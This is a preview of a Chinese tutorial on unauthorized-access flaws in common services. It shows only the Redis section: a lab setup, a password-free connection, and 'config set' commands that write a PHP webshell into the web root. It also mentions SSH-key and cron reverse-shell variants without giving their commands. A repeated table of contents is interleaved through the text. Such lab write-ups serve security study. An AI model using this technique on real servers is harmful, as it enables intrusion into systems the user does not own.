没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
(https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F6103&from_type=xianzhi)
常见未授权访问漏洞总结
小维 (/u/22110) / 2019-08-28 09:10:00 / 浏览数 9888
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
常 见 的 未 授 权 访 问 漏 洞 :
Redis 未 授 权 访 问 漏 洞
MongoDB 未 授 权 访 问 漏 洞
Jenkins 未 授 权 访 问 漏 洞
Memcached 未 授 权 访 问 漏 洞
JBOSS 未 授 权 访 问 漏 洞
VNC 未 授 权 访 问 漏 洞
Docker 未 授 权 访 问 漏 洞
ZooKeeper 未 授 权 访 问 漏 洞
Rsync 未 授 权 访 问 漏 洞
Atlassian Crowd 未 授 权 访 问 漏 洞
CouchDB 未 授 权 访 问 漏 洞
Elasticsearch 未 授 权 访 问 漏 洞
Hadoop 未 授 权 访 问 漏 洞
Jupyter Notebook 未 授 权 访 问 漏 洞
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问
等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器
的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,
可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以
使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。
目 标 靶 机 : Centos7
ip地 址 : 192.168.18.138
连 接 工 具 :Xshell
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090558-fe7e2d8a-c92f-1.jpg)
tar xzvf redis-2.8.17.tar.gz #解 压 安 装 包
cd redis-2.8.17 # 进 入 redis目 录
make #编 译
Redis未授权访问漏洞
漏洞简介以及危害
漏洞利用
环境介绍
环境搭建
漏洞简介以及危害
漏洞利用
防御手段
Docker 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
ZooKeeper 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Rsync 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Atlassian Crowd 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
CouchDB 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Elasticsearch 未授权访问漏洞
漏洞简介以及危害
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090558-fea0059a-c92f-1.jpg)
服务启动成功!
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090558-fec5ebb6-c92f-1.jpg)
服务启动成功
为了方便,在windows攻击机里下载一个redis clinet
下载地址:https://github.com/caoxinyu/RedisClient/releases (https://github.com/caoxinyu/RedisClient/releases) (利用redis
写webshell测试使用)
cd src/ #进 入 src目 录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将 redis-server和 redis-cli拷 贝 到 /usr/bin目 录 下 ( 这 样 启 动 redis-server和 redis-cli就 不 用 每 次 都
cd .. # 返 回 上 一 级 目 录
cp redis.conf /etc/ #将 redis.conf拷 贝 到 /etc/目 录 下
redis-server /etc/redis.conf # 使 用 /etc/目 录 下 的 redis.conf文 件 中 的 配 置 启 动 redis服 务
漏洞简介以及危害
漏洞利用
防御手段
Docker 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
ZooKeeper 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Rsync 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Atlassian Crowd 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
CouchDB 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Elasticsearch 未授权访问漏洞
漏洞简介以及危害
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090558-fee2c3c6-c92f-1.jpg)
下载地址:https://github.com/dmajkic/redis/downloads (https://github.com/dmajkic/redis/downloads) (利用crontab反弹shell
测试使用)
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090558-fef13618-c92f-1.jpg)
使用redis clinet 直接无账号成功登录redis
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090559-ff14b480-c92f-1.jpg)
从登录结果可以看出redis未启用认证。
未授权访问测试
漏洞简介以及危害
漏洞利用
防御手段
Docker 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
ZooKeeper 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Rsync 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Atlassian Crowd 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
CouchDB 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Elasticsearch 未授权访问漏洞
漏洞简介以及危害
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090559-ff347f40-c92f-1.jpg)
利 用 前 提 :
靶 机 redis未 授 权 , 在 攻 击 机 能 用 redis clinet连 接 , 如 上 图 , 并 未 登 录 验 证
靶 机 开 启 web服 务 , 并 且 知 道 网 站 路 径 , 还 需 要 具 有 文 件 读 写 增 删 改 查 权 限
靶机网站路径:/var/www/html/
这里我们调出Console
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090559-ff594b9a-c92f-1.jpg)
由于本地搭建,我们已经知道网站路径,我们把shell写入/var/www/html/目录下:
config set dir /var/www/html
config set dbfilename test.php
config set webshell "<?php phpinfo(); ?>"
save
利用redis写webshell
漏洞简介以及危害
漏洞利用
防御手段
Docker 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
ZooKeeper 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Rsync 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Atlassian Crowd 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
CouchDB 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Elasticsearch 未授权访问漏洞
漏洞简介以及危害
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090559-ff847806-c92f-1.jpg)
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090600-ffa66894-c92f-1.jpg)
(https://xzfile.aliyuncs.com/media/upload/picture/20190828090600-ffc75e50-c92f-1.jpg)
漏洞简介以及危害
漏洞利用
防御手段
Docker 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
ZooKeeper 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Rsync 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Atlassian Crowd 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
CouchDB 未授权访问漏洞
漏洞简介以及危害
漏洞利用
防御手段
Elasticsearch 未授权访问漏洞
漏洞简介以及危害
剩余38页未读,继续阅读
资源评论
柔粟
- 粉丝: 24
- 资源: 305
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功